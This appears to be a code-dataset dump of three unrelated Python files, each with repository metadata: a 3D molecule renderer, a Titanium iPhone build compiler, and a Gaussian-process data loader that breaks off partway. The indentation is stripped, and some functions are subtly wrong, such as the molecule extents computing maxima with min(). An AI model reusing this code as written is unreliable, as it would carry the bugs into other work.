def __get_arrow_mesh(self,
xyz1,
xyz2,
color,
radius_small=0.1,
radius_large=0.3,
arrow_height=0.6):
"""
This function returns a mesh for an arrow between two points
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the arrow
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the arrow
color : str
Hexadecimal color code
radius_small : float
The radius of the arrow tail
radius_large : float
The radius of the base of the arrow cone
arrow_height : float
The height of the arrow cone
"""
x1, y1, z1 = xyz1
x2, y2, z2 = xyz2
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
fraction = (d - arrow_height) / d
xyz_base = [
x1 + (x2 - x1) * fraction, y1 + (y2 - y1) * fraction,
z1 + (z2 - z1) * fraction
]
mesh = []
mesh.append(self.__get_cylinder_mesh(xyz1, xyz_base, radius_small,
radius_small, color))
mesh.append(self.__get_cylinder_mesh(xyz_base, xyz2, radius_large, 0.0,
color))
return mesh
def __plane_rotation_matrix(self, normal):
"""
Computes the rotation matrix that converts a plane (circle/square) geometry in
its standard orientation to one in which the plane is orthogonal to a given
vector (normal). By default, planes in pythreejs are orthogonal to the vector (0,0,1),
that is, they lay on the xy plane
Parameters
----------
normal : tuple(float, float, float)
The vector to which we want to make a plane orthogonal
"""
# normalize the vector
x, y, z = normal
d = sqrt(x**2 + y**2 + z**2)
x /= d
y /= d
z /= d
# compute the cross product: normal x (0,0,1)
c0 = y
c1 = -x
c2 = 0.0
# compute the dot product: normal . (0,0,1)
dot = z
c = dot
s = sqrt(1 - c**2)
# rotation matrix, see https://en.wikipedia.org/wiki/Rotation_matrix#Rotation_matrix_from_axis_and_angle
R = [
c + (1 - c) * c0**2, c0 * c1 * (1 - c), c1 * s, c0 * c1 * (1 - c),
c + (1 - c) * c1**2, -c0 * s, -c1 * s, c0 * s, c
]
return R
def bond_cutoff(self, r1, r2):
"""
Compute the cutoff value for displaying a bond between two atoms
Parameters
----------
r1 : float
The radius of atom 1
r2 : float
The radius of atom 2
"""
return 1.5 * self.angtobohr * (r1 + r2)
def __cylinder_rotation_matrix(self, xyz1, xyz2):
"""
Computes the rotation matrix that converts a cylinder geometry in its standard
orientation to a cylinder that starts at point xyz1 and ends at xyz2
Parameters
----------
xyz1 : tuple(float, float, float)
The (x1, y1, z1) coordinates of the beginning of the cylinder
xyz2 : tuple(float, float, float)
The (x2, y2, z2) coordinates of the end of the cylinder
"""
x1, y1, z1 = xyz1
x2, y2, z2 = xyz2
d = sqrt((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)
b1 = (x2 - x1) / d
b2 = (y2 - y1) / d
b3 = (z2 - z1) / d
gamma = 1 / (1 + b2)
R = [
1 - b1 * b1 * gamma, -b1, -b1 * b3 * gamma, b1,
1 - (b1 * b1 + b3 * b3) * gamma, b3, -b1 * b3 * gamma, -b3,
1 - b3 * b3 * gamma
]
return R
def __isosurface_mesh(self, data, level, color, extent=None, opacity=1.0):
"""
This function returns a Mesh object (Geometry + Material) for an isosurface
Parameters
----------
data : numpy.ndarray
A 3D array containing the values on a grid
level : float
The isosurface level. This must be included in the range of values on the grid
color : str
Hexadecimal code for the color used to display the surface
extent : list
list of [[xmin, xmax], [ymin, ymax], [zmin, zmax]] values that define the bounding box of the mesh,
otherwise the viewport is used
opacity : float
The opacity of the surface (default = 1.0)
"""
vertices, faces = self.__compute_isosurface(data,
level=level,
color=color,
extent=extent)
# Create the geometry
isoSurfaceGeometry = Geometry(vertices=vertices, faces=faces)
# Calculate normals per vertex for round edges
isoSurfaceGeometry.exec_three_obj_method('computeVertexNormals')
if opacity == 1.0:
material = MeshStandardMaterial(vertexColors='VertexColors',
roughness=0.3,
metalness=0.0,
side='DoubleSide',
transparent=False)
else:
material = MeshStandardMaterial(vertexColors='VertexColors',
roughness=0.3,
metalness=0.0,
side='DoubleSide',
transparent=True,
opacity=opacity)
# Create a mesh
isoSurfaceMesh = Mesh(geometry=isoSurfaceGeometry, material=material)
return isoSurfaceMesh
def __compute_isosurface(self, data, level, color, extent=None):
"""
Compute the vertices and faces of an isosurface from grid data
Parameters
----------
data : numpy.ndarray
Grid data stored as a numpy 3D tensor
level : float
The isocontour value that defines the surface
color :
color of a face
extent : list
list of [[xmin, xmax], [ymin, ymax], [zmin, zmax]] values that define the bounding box of the mesh,
otherwise the viewport is used
Returns
-------
a tuple of vertices and faces
"""
values = skimage.measure.marching_cubes_lewiner(data, level * 0.995)
sk_verts, sk_faces, normals, values = values
x, y, z = sk_verts.T
# Rescale coordinates to given limits
if extent:
xlim, ylim, zlim = extent
x = x * np.diff(xlim) / (data.shape[0]) + xlim[0]
y = y * np.diff(ylim) / (data.shape[1]) + ylim[0]
z = z * np.diff(zlim) / (data.shape[2]) + zlim[0]
# Assemble the list of vertices
vertices = []
for n in range(len(x)):
vertices.append([x[n], y[n], z[n]])
# Assemble the list of faces
faces = []
for face in sk_faces:
i, j, k = face
faces.append((i, j, k, None, (color, color, color), None))
return (vertices, faces)
def __molecule_extents(self, atoms_list):
"""
Compute the extent of a molecule
Parameters
----------
atoms_list : list(tuple(str, float, float, float))
A list of tuples containing the atomic symbol and coordinates of the atom using the format
(atomic symbol,x,y,z)
Returns
-------
A tuple(float, float, float, float, float, float) containing the minimum and maximum
coordinates of this molecule in the format (minx, maxx, miny, maxy, minz, maxz)
"""
minx = min(map(lambda x: x[1], atoms_list))
maxx = min(map(lambda x: x[1], atoms_list))
miny = min(map(lambda x: x[2], atoms_list))
maxy = min(map(lambda x: x[2], atoms_list))
minz = min(map(lambda x: x[3], atoms_list))
maxz = min(map(lambda x: x[3], atoms_list))
return (minx, maxx, miny, maxy, minz, maxz)
def __center_of_mass(self, atoms_list):
"""
This function returns the center of mass of a molecule
Parameters
----------
atoms_list : list(tuple(str, float, float, float))
A list of tuples containing the atomic symbol and coordinates of the atom using the format
(atomic symbol,x,y,z)
"""
X = 0.0
Y = 0.0
Z = 0.0
M = 0.0
for (symbol, x, y, z) in atoms_list:
mass = ATOM_DATA[ATOM_SYMBOL_TO_Z[symbol]]['mass']
X += mass * x
Y += mass * y
Z += mass * z
M += mass
return (X / M, Y / M, Z / M)
|
evangelistalab/forte
|
forte/utils/py3js_renderer.py
|
Python
|
lgpl-3.0
| 43,790
|
[
"Psi4"
] |
d5300c837bdc733c562ba3879910a7eced279801645dfd582fd087f724dce436
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Project Compiler
#
import os, sys, re, shutil, time, base64, run, sgmllib, codecs
template_dir = os.path.abspath(os.path.dirname(sys._getframe(0).f_code.co_filename))
sys.path.append(os.path.join(template_dir,'../'))
sys.path.append(os.path.join(template_dir,'../module'))
from tiapp import *
import jspacker
from csspacker import CSSPacker
from module import ModuleDetector
ignoreFiles = ['.gitignore', '.cvsignore', '.DS_Store'];
ignoreDirs = ['.git','.svn','_svn','CVS','android','iphone'];
HEADER = """/**
* Appcelerator Titanium Mobile
* This is generated code. Do not modify. Your changes *will* be lost.
* Generated code is Copyright (c) 2009-2011 by Appcelerator, Inc.
* All Rights Reserved.
*/
#import <Foundation/Foundation.h>
"""
INTERFACE_HEADER= """
@interface ApplicationRouting : NSObject {
}
+ (NSData*) resolveAppAsset:(NSString*)path;
"""
IMPL_HEADER= """#import "ApplicationRouting.h"
extern NSData * decode64 (NSData * thedata);
extern NSData * dataWithHexString (NSString * hexString);
extern NSData * decodeDataWithKey (NSData * thedata, NSString * key);
@implementation ApplicationRouting
"""
FOOTER ="""
@end
"""
MODULE_IMPL_HEADER = """#import "ApplicationMods.h"
@implementation ApplicationMods
+ (NSArray*) compiledMods
{
NSMutableArray *modules = [NSMutableArray array];
"""
class HTMLParser(sgmllib.SGMLParser):
def parse(self, s):
self.feed(s)
self.close()
def __init__(self, verbose=0):
sgmllib.SGMLParser.__init__(self, verbose)
self.scripts = []
def start_script(self, attributes):
for name, value in attributes:
if name == "src":
self.scripts.append(value)
def get_scripts(self):
return self.scripts
def read_module_properties(dir):
file = os.path.join(dir,'manifest')
dict = {}
if os.path.exists(file):
contents = open(file).read()
for line in contents.splitlines(True):
if line[0:1]=='#': continue
idx = line.find(':')
if idx==-1: continue
k=line[0:idx]
v=line[idx+1:].strip()
dict[k]=v
return dict
# Need to pre-parse xcconfig files to mangle variable names, and then
# dump them into a map so that we can re-assemble them later
def parse_xcconfig(xcconfig, moduleId, variables):
module_xcconfig = open(xcconfig)
new_xcconfig = ''
local_variables = {}
prefix = moduleId.upper().replace('.','_')
for line in module_xcconfig:
# Strip comments
comment = line.find('//')
if comment != -1:
line = line[0:comment]
# Generate new varname / value pairings
# The regular expression parses a valid line into components
# <var>=<value>
# <var>[<key>=<keyvalue>]=<value>
# e.g.
# OTHER_LDFLAGS=-framework EventKit
# OTHER_LDFLAGS[sdk=iphoneos4*]=-liconv
splitline = re.split('(([^\[=]+)(\[[^\]]+\])?) *=? *(.+)', line)
if len(splitline) >= 5:
varname = splitline[1]
value = splitline[4]
name = prefix + '_' + varname.strip()
name = re.sub(r'[^\w]', '_', name)
local_variables[varname] = name
new_xcconfig += name + '=' + value + '\n'
module_xcconfig.close()
# Update any local variable references with new varname
# and add variables to the global variables map
for (varname, name) in local_variables.iteritems():
source = '$(%s)' % varname
target = '$(%s)' % name
new_xcconfig = new_xcconfig.replace(source,target)
# Add new varname to the list
if not varname in variables:
variables[varname] = [name]
else:
variables[varname].append(name)
new_xcconfig += '\n'
return new_xcconfig
#
# TODO/FIXME
#
# - encryptor
#
class Compiler(object):
def __init__(self,project_dir,appid,name,deploytype,xcode,devicefamily,iphone_version,silent=False):
self.project_dir = project_dir
self.project_name = name
self.appid = appid
self.iphone_dir = os.path.join(project_dir,'build','iphone')
self.classes_dir = os.path.join(self.iphone_dir,'Classes')
self.modules = []
self.modules_metadata = []
# for now, these are required
self.defines = ['USE_TI_ANALYTICS','USE_TI_NETWORK','USE_TI_PLATFORM','USE_TI_UI', 'USE_TI_API']
tiapp_xml = os.path.join(project_dir,'tiapp.xml')
ti = TiAppXML(tiapp_xml)
sdk_version = os.path.basename(os.path.abspath(os.path.join(template_dir,'../')))
detector = ModuleDetector(project_dir)
missing_modules, modules = detector.find_app_modules(ti, 'iphone')
if xcode:
app_name = os.environ['FULL_PRODUCT_NAME']
app_dir = os.path.join(os.environ['TARGET_BUILD_DIR'],os.environ['CONTENTS_FOLDER_PATH'])
else:
target = 'Debug'
if deploytype == 'production':
target = 'Release'
app_name = name+'.app'
app_folder_name = '%s-iphoneos' % target
app_dir = os.path.abspath(os.path.join(self.iphone_dir,'build',app_folder_name,app_name))
main_template_file = os.path.join(template_dir,'main.m')
main_template = codecs.open(main_template_file, encoding='utf-8').read()
main_template = main_template.replace('__PROJECT_NAME__',name)
main_template = main_template.replace('__PROJECT_ID__',appid)
main_template = main_template.replace('__DEPLOYTYPE__',deploytype)
main_template = main_template.replace('__APP_ID__',appid)
main_template = main_template.replace('__APP_ANALYTICS__',ti.properties['analytics'])
main_template = main_template.replace('__APP_PUBLISHER__',ti.properties['publisher'])
main_template = main_template.replace('__APP_URL__',ti.properties['url'])
main_template = main_template.replace('__APP_NAME__',ti.properties['name'])
main_template = main_template.replace('__APP_VERSION__',ti.properties['version'])
main_template = main_template.replace('__APP_DESCRIPTION__',ti.properties['description'])
main_template = main_template.replace('__APP_COPYRIGHT__',ti.properties['copyright'])
main_template = main_template.replace('__APP_GUID__',ti.properties['guid'])
main_template = main_template.replace('__APP_RESOURCE_DIR__','')
if not silent:
print "[INFO] Titanium SDK version: %s" % sdk_version
print "[INFO] iPhone Device family: %s" % devicefamily
print "[INFO] iPhone SDK version: %s" % iphone_version
main_template_out = os.path.join(self.iphone_dir,'main.m')
main_file = codecs.open(main_template_out,'w+',encoding='utf-8')
main_file_contents = main_file.read()
if main_file_contents!=main_template:
main_file.write(main_template)
main_file.close()
if deploytype == 'production':
version = ti.properties['version']
# we want to make sure in debug mode the version always changes
version = "%s.%d" % (version,time.time())
ti.properties['version']=version
resources_dir = os.path.join(project_dir,'Resources')
iphone_resources_dir = os.path.join(resources_dir,'iphone')
# copy in any resources in our module like icons
project_module_dir = os.path.join(project_dir,'modules','iphone')
if os.path.exists(project_module_dir):
self.copy_resources([project_module_dir],app_dir,False)
# we have to copy these even in simulator given the path difference
if os.path.exists(app_dir):
self.copy_resources([iphone_resources_dir],app_dir,False)
# generate the includes for all compiled modules
xcconfig_c = "// this is a generated file - DO NOT EDIT\n\n"
has_modules = False
if len(modules) > 0:
mods = open(os.path.join(self.classes_dir,'ApplicationMods.m'),'w+')
variables = {}
mods.write(MODULE_IMPL_HEADER)
for module in modules:
module_id = module.manifest.moduleid.lower()
module_name = module.manifest.name.lower()
module_version = module.manifest.version
module_guid = ''
module_licensekey = ''
if module.manifest.has_property('guid'):
module_guid = module.manifest.guid
if module.manifest.has_property('licensekey'):
module_licensekey = module.manifest.licensekey
self.modules_metadata.append({'guid':module_guid,'name':module_name,'id':module_id,'dir':module.path,'version':module_version,'licensekey':module_licensekey})
xcfile = module.get_resource('module.xcconfig')
if os.path.exists(xcfile):
xcconfig_contents = parse_xcconfig(xcfile, module_id, variables)
xcconfig_c += xcconfig_contents
xcfile = os.path.join(self.project_dir,'modules','iphone',"%s.xcconfig" % module_name)
if os.path.exists(xcfile):
xcconfig_contents = parse_xcconfig(xcfile, module_id, variables)
xcconfig_c += xcconfig_contents
mods.write(" [modules addObject:[NSDictionary dictionaryWithObjectsAndKeys:@\"%s\",@\"name\",@\"%s\",@\"moduleid\",@\"%s\",@\"version\",@\"%s\",@\"guid\",@\"%s\",@\"licensekey\",nil]];\n" % (module_name,module_id,module_version,module_guid,module_licensekey));
mods.write(" return modules;\n")
mods.write("}\n")
mods.write(FOOTER)
mods.close()
for (name, values) in variables.iteritems():
xcconfig_c += name + '=$(inherited) '
for value in values:
xcconfig_c += '$(%s) ' % value
xcconfig_c += '\n'
has_modules = True
xcconfig = os.path.join(self.iphone_dir,"module.xcconfig")
make_xcc = True
if os.path.exists(xcconfig):
existing_xcc = open(xcconfig).read()
# only copy if different so we don't trigger re-compile in xcode
make_xcc = existing_xcc!=xcconfig_c
if make_xcc:
xcconfig = open(xcconfig,'w')
xcconfig.write(xcconfig_c)
xcconfig.close()
if deploytype=='simulator':
shutil.copy(os.path.join(template_dir,'Classes','defines.h'),os.path.join(self.classes_dir,'defines.h'))
if deploytype!='development' or has_modules:
if os.path.exists(app_dir) and deploytype != 'development':
self.copy_resources([resources_dir],app_dir)
if deploytype == 'production':
debugger_plist = os.path.join(app_dir,'debugger.plist')
if os.path.exists(debugger_plist):
os.remove(debugger_plist)
if deploytype!='development':
defines_file = os.path.join(self.classes_dir,'defines.h')
defines_header = open(defines_file,'w+')
defines_content = "// Warning: this is generated file. Do not modify!\n\n"
defines_content+= "#define TI_VERSION %s\n"%sdk_version
for sym in self.defines:
defines_content+="#define %s 1\n"%sym
if defines_content!=defines_header.read():
defines_header.write(defines_content)
defines_header.close()
# deploy any module image files
for module in self.modules:
img_dir = os.path.join(template_dir,'modules',module.lower(),'images')
print "[DEBUG] module image = %s" % img_dir
if not os.path.exists(img_dir): continue
dest_img_dir = os.path.join(app_dir,'modules',module.lower(),'images')
if not os.path.exists(dest_img_dir):
os.makedirs(dest_img_dir)
self.copy_resources([img_dir],dest_img_dir,False)
if deploytype!='development' and os.path.exists(app_dir):
# optimize PNGs - since we don't include them in the Resources of the xcodeproj
# the ones we copy in won't get optimized so we need to run it manually
# we can skip this on the simulator but should do it on device
dev_path = "/Developer"
# we need to ask xcode where the root path is
path = run.run(["/usr/bin/xcode-select","-print-path"],True,False)
if path:
dev_path = path.strip()
run.run(["%s/Platforms/iPhoneOS.platform/Developer/usr/bin/iphoneos-optimize"%dev_path,app_dir],False)
# remove empty directories
os.chdir(app_dir)
os.system("find . -type d -empty -delete")
else:
print "[INFO] Skipping JS compile, running from simulator"
if deploytype=='development':
self.softlink_resources(resources_dir,app_dir)
self.softlink_resources(iphone_resources_dir,app_dir)
def add_symbol(self,api):
print "[DEBUG] detected symbol: %s" % api
curtoken = ''
tokens = api.split(".")
try:
self.modules.index(tokens[0])
except:
self.modules.append(tokens[0])
for token in tokens:
curtoken+=token+"."
symbol = 'USE_TI_%s' % (curtoken.replace('.create','').replace('.','').replace('-','_').upper())
try:
self.defines.index(symbol)
except:
self.defines.append(symbol)
def extract_tokens(self,sym,line):
# sloppy joe parsing coooode
# could be prettier and faster but it works and rather reliable
c = 0
tokens = []
search = sym + "."
size = len(search)
while True:
i = line.find(search,c)
if i < 0:
break
found = False
buf = ''
x = 0
for n in line[i+size:]:
# look for a terminal - this could probably be easier
if n in ['(',')','{','}','=',',',' ',':','!','[',']','+','*','/','~','^','%','\n','\t','\r']:
found = True
break
buf+=n
x+=1
tokens.append(buf)
if found:
c = i + x + 1
continue
break
return tokens
def compile_js(self,file_contents):
for line in file_contents.split(';'):
for symbol in ('Titanium','Ti'):
for sym in self.extract_tokens(symbol,line):
self.add_symbol(sym)
def process_html_files(self,data,source_root):
compile = []
if data.has_key('.js'):
for entry in data['.html']:
html_file = entry['from']
file_contents = open(os.path.expanduser(html_file)).read()
parser = HTMLParser()
parser.parse(file_contents)
# extract all our scripts that are dependencies and we
# don't compile these
scripts = parser.get_scripts()
if len(scripts) > 0:
js_files = data['.js']
for script in scripts:
# if a remote script, ignore
if script.startswith('http:') or script.startswith('https:'):
continue
if script.startswith('app://'):
script = script[6:]
# build a file relative to the html file
fullpath = os.path.abspath(os.path.join(os.path.dirname(html_file),script))
# remove this script from being compiled
for f in js_files:
if f['from']==fullpath:
# target it to be compiled
compile.append(f)
js_files.remove(f)
break
return compile
@classmethod
def make_function_from_file(cls,path,file,instance=None):
file_contents = open(os.path.expanduser(file)).read()
file_contents = jspacker.jsmin(file_contents)
file_contents = file_contents.replace('Titanium.','Ti.')
if instance: instance.compile_js(file_contents)
data = str(file_contents).encode("hex")
method = "dataWithHexString(@\"%s\")" % data
return {'method':method,'path':path}
def softlink_resources(self,source,target):
if not os.path.exists(target):
os.makedirs(target)
for file in os.listdir(source):
if (file in ignoreDirs) or (file in ignoreFiles):
continue
from_ = os.path.join(source, file)
to_ = os.path.join(target, file)
print "[DEBUG] linking: %s to %s" % (from_,to_)
if os.path.exists(to_):
if os.path.islink(to_):
os.remove(to_)
os.symlink(from_, to_)
else:
os.symlink(from_, to_)
def copy_resources(self,sources,target,write_routing=True):
if write_routing:
intf = open(os.path.join(self.classes_dir,'ApplicationRouting.h'),'w+')
impf = open(os.path.join(self.classes_dir,'ApplicationRouting.m'),'w+')
intf.write(HEADER)
intf.write(INTERFACE_HEADER)
impf.write(HEADER)
impf.write(IMPL_HEADER)
impf.write("+ (NSData*) resolveAppAsset:(NSString*)path;\n{\n")
impf.write(" static NSMutableDictionary *map;\n")
impf.write(" if (map==nil)\n")
impf.write(" {\n")
impf.write(" map = [[NSMutableDictionary alloc] init];\n")
impf_buffer = ''
if not os.path.exists(os.path.expanduser(target)):
os.makedirs(os.path.expanduser(target))
def add_compiled_resources(source,target):
print "[DEBUG] copy resources from %s to %s" % (source,target)
compiled_targets = {}
for root, dirs, files in os.walk(source):
for name in dirs: # don't walk through .bundle directories to avoid detecting media files within them and copying the same ressources in 3 places instead of one
if name.find(".bundle")>0:
dirs.remove(name)
for name in ignoreDirs:
if name in dirs:
dirs.remove(name) # don't visit ignored directories
for file in files:
if file[-7:] == '.coffee': # don't copy .coffee script files
coffee_file = os.path.join(root, file)
ignoreFiles.append(file)
if file in ignoreFiles:
continue
prefix = root[len(source):]
from_ = os.path.join(root, file)
to_ = os.path.expanduser(from_.replace(source, target, 1))
to_directory = os.path.expanduser(os.path.split(to_)[0])
if not os.path.exists(to_directory):
os.makedirs(to_directory)
fp = os.path.splitext(file)
ext = fp[1]
if ext == '.jss': continue
if len(fp)>1 and write_routing and ext in ['.html','.js','.css']:
path = prefix + os.sep + file
path = path[1:]
entry = {'path':path,'from':from_,'to':to_}
if compiled_targets.has_key(ext):
compiled_targets[ext].append(entry)
else:
compiled_targets[ext]=[entry]
else:
# only copy if different filesize or doesn't exist
if not os.path.exists(to_) or os.path.getsize(from_)!=os.path.getsize(to_):
print "[DEBUG] copying: %s to %s" % (from_,to_)
shutil.copyfile(from_, to_)
if compiled_targets.has_key('.html'):
compiled = self.process_html_files(compiled_targets,source)
if len(compiled) > 0:
for c in compiled:
from_ = c['from']
to_ = c['to']
path = c['path']
print "[DEBUG] copying: %s to %s" % (from_,to_)
file_contents = open(from_).read()
file_contents = jspacker.jsmin(file_contents)
file_contents = file_contents.replace('Titanium.','Ti.')
to = open(to_,'w')
to.write(file_contents)
to.close()
for ext in ('.css','.html'):
if compiled_targets.has_key(ext):
for css_file in compiled_targets[ext]:
from_ = css_file['from']
to_ = css_file['to']
print "[DEBUG] copying: %s to %s" % (from_,to_)
if path.endswith('.css'):
file_contents = open(from_).read()
packer = CSSPacker(file_contents)
file_contents = packer.pack()
to = open(to_,'w')
to.write(file_contents)
to.close()
else:
shutil.copyfile(from_, to_)
if compiled_targets.has_key('.js'):
for js_file in compiled_targets['.js']:
path = js_file['path']
from_ = js_file['from']
to_ = js_file['to']
print "[DEBUG] compiling: %s" % from_
metadata = Compiler.make_function_from_file(path,from_,self)
method = metadata['method']
eq = path.replace('.','_')
impf.write(' [map setObject:%s forKey:@"%s"];\n' % (method,eq))
# copy in any module assets
for metadata in self.modules_metadata:
tp_dir = os.path.join(metadata['dir'],'assets')
if not os.path.exists(tp_dir): continue
tp_id = metadata['id']
t = '%s/modules/%s' %(target,tp_id)
add_compiled_resources(tp_dir,t)
for source in sources:
add_compiled_resources(source,target)
if write_routing:
impf.write(" }\n")
impf.write(" return [map objectForKey:path];\n")
impf.write('}\n')
impf.write(impf_buffer)
intf.write(FOOTER)
impf.write(FOOTER)
intf.close()
impf.close()
if __name__ == "__main__":
project_dir = os.path.expanduser("~/tmp/yoyoyo")
appid = "com.appcelerator.yoyoyo"
name = "Yo Yo Yo"
deploytype = 'development'
xcode = False
c = Compiler(project_dir,appid,name,deploytype,xcode)
|
arnaudsj/titanium_mobile
|
support/iphone/compiler.py
|
Python
|
apache-2.0
| 19,432
|
[
"VisIt"
] |
04c85ca508d36cebcf74ed88d8c5263a7e1fa24f651e220d3741e856669fa4a9
|
__author__ = 'AT'
import gzip
import os
import cPickle
import pandas
from ExtRBF import ExtRBF
import GPy
import numpy as np
class DataSource:
"""
Loading and preparing data for experiments. Some of the datasets are generated using the Matlab code
(see data/matlab_code_data), in order to ensure they are
the same training and test points that were used in the previous paper (Nguyen and Bonilla NIPS (2014)).
The Matlab code to generate data is ``load_data.m``
"""
def __init__(self):
pass
@staticmethod
def normal_generate_samples(n_samples, var, input_dim=3):
num_samples = n_samples
num_in = input_dim
X = np.random.uniform(low=-1.0, high=1.0, size=(num_samples, num_in))
X.sort(axis=0)
rbf = ExtRBF(num_in, variance=0.5,
lengthscale=np.array(np.random.uniform(low=0.1, high=3.0, size=input_dim)), ARD=True)
white = GPy.kern.White(num_in, variance=var[0,0])
kernel = rbf + white
K = kernel.K(X)
y = np.empty((num_samples, var.shape[0]))
for j in range(var.shape[0]):
y[:, j] = np.reshape(np.random.multivariate_normal(np.zeros(num_samples), K), (num_samples))
return X, y, rbf
@staticmethod
def wisconsin_breast_cancer_data():
"""
Loads and returns data of Wisconsin breast cancer dataset. Note that ``X`` is standardized.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
Notes
-----
Data is directly imported from the Matlab code for AVIGP paper.
References
----------
* Mangasarian OL, Street WN, Wolberg WH. Breast cancer diagnosis and prognosis via linear programming.
Oper Res. 1995;43(4);570-7
"""
# uncomment these lines to read directly from original file
# data_test = pandas.read_csv('../data/breast-cancer-wisconsin.csv', header=None)
# # replacing Y values with -1 and 1
# data_test.loc[data_test[10] == 2, 10] = -1
# data_test.loc[data_test[10] == 4, 10] = 1
# data_test = data_test.convert_objects(convert_numeric=True).dropna()
# X = data_test.ix[:, 1:9]
# Y = data_test.ix[:, 10]
# return np.array(X), Y[:, np.newaxis]
data = []
for i in range(1, 6):
train = pandas.read_csv('data/wisconsin_cancer/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/wisconsin_cancer/test_' + str(i) + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1:].values,
'test_Y': test.ix[:, 0].values[:, np.newaxis],
'test_X': test.ix[:, 1:].values,
'id': i
})
return data
@staticmethod
def USPS_data():
"""
Loads and returns data of USPS dataset. Note that ``X`` is standardized. Only digits 4,7, and 9 are included.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Rasmussen CE, Williams CKI. {G}aussian processes for machine learning. The MIT Press; 2006.
Data is imported from the Matlab code.
"""
data = []
for i in range(1, 6):
train = pandas.read_csv('data/USPS/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/USPS/test_' + str(i) + '.csv', header=None)
# data.append({
# 'train_Y': label_to_num(train.ix[:, 0:2].values),
# 'train_X': train.ix[:, 3:].values,
# 'test_Y': label_to_num(test.ix[:, 0:2].values),
# 'test_X': test.ix[:, 3:].values,
# 'id': i
# })
data.append({
'train_Y': train.ix[:, 0:2].values,
'train_X': train.ix[:, 3:].values,
'test_Y': test.ix[:, 0:2].values,
'test_X': test.ix[:, 3:].values,
'id': i
})
return data
@staticmethod
def mining_data():
"""
Loads and returns data of Coal-mining disasters dataset. See 'get_mine_data.m' to see how data is generated.
Returns
-------
data : list
a list of length = 1, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``. Training and test points are the same.
References
----------
* Jarrett RG. A note on the intervals between coal-mining disasters. Biometrika. 1979;66(1):191-3.
"""
data = []
train = pandas.read_csv('data/mining/data.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1].values[:, np.newaxis],
'test_Y': train.ix[:, 0].values[:, np.newaxis],
'test_X': train.ix[:, 1].values[:, np.newaxis],
'id': 1
})
return data
@staticmethod
def boston_data():
"""
Loads and returns data of Boston housing dataset. Note data ``X`` is standardized.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Harrison Jr D, Rubinfeld DL. Hedonic housing prices and the demand for clean air. J Environ Econ Manage.
1978;5(1):81-102.
"""
data = []
for i in range(1, 6):
train = pandas.read_csv('data/boston_housing/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/boston_housing/test_' + str(i) + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1:].values,
'test_Y': test.ix[:, 0].values[:, np.newaxis],
'test_X': test.ix[:, 1:].values,
'id': i
})
return data
@staticmethod
def abalone_data():
"""
Loads and returns data of Abalone dataset.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Bache K, Lichman M. {UCI} Machine Learning Repository [Internet]. 2013. Available from: http://archive.ics.uci.edu/ml
"""
data = []
for i in range(5, 11):
train = pandas.read_csv('data/abalone/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/abalone/test_' + str(i) + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1:].values,
'test_Y': test.ix[:, 0].values[:, np.newaxis],
'test_X': test.ix[:, 1:].values,
'id': i
})
return data
@staticmethod
def creep_data():
"""
Loads and returns data of Creep dataset.
Returns
-------
data : list
a list of length = 5, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Cole D, Martin-Moran C, Sheard AG, Bhadeshia HKDH, MacKay DJC.
Modelling creep rupture strength of ferritic steel welds. Sci Technol Weld Join. 2000;5(2):81-9.
"""
data = []
for i in range(1, 6):
train = pandas.read_csv('data/creep/train_' + str(i) + '.csv', header=None)
test = pandas.read_csv('data/creep/test_' + str(i) + '.csv', header=None)
data.append({
'train_Y': train.ix[:, 0].values[:, np.newaxis],
'train_X': train.ix[:, 1:].values,
'test_Y': test.ix[:, 0].values[:, np.newaxis],
'test_X': test.ix[:, 1:].values,
'id': i
})
return data
@staticmethod
def mnist_data():
"""
Loads and returns data of MNIST dataset for all digits.
Returns
-------
data : list
a list of length = 1, where each element is a dictionary which contains
``train_Y``, ``train_X``, ``test_Y``, ``test_X``, and ``id``
References
----------
* Data is imported from this project: http://deeplearning.net/tutorial/gettingstarted.html
"""
#############
# LOAD DATA #
#############
dataset = 'mnist.pkl.gz'
# Download the MNIST dataset if it is not present
data_dir, data_file = os.path.split(dataset)
if data_dir == "" and not os.path.isfile(dataset):
# Check if dataset is in the data directory.
new_path = os.path.join(
os.path.split(__file__)[0],
"..",
"data",
dataset
)
if os.path.isfile(new_path) or data_file == 'mnist.pkl.gz':
dataset = new_path
if (not os.path.isfile(dataset)) and data_file == 'mnist.pkl.gz':
import urllib
origin = (
'http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz'
)
print 'Downloading data from %s' % origin
urllib.urlretrieve(origin, dataset)
print '... loading data'
# Load the dataset
f = gzip.open(dataset, 'rb')
train_set, valid_set, test_set = cPickle.load(f)
f.close()
test_Y = np.zeros((test_set[1].shape[0], 10))
test_Y[np.arange(test_set[1].shape[0]), test_set[1]] = 1
train_Y = np.zeros((train_set[1].shape[0], 10))
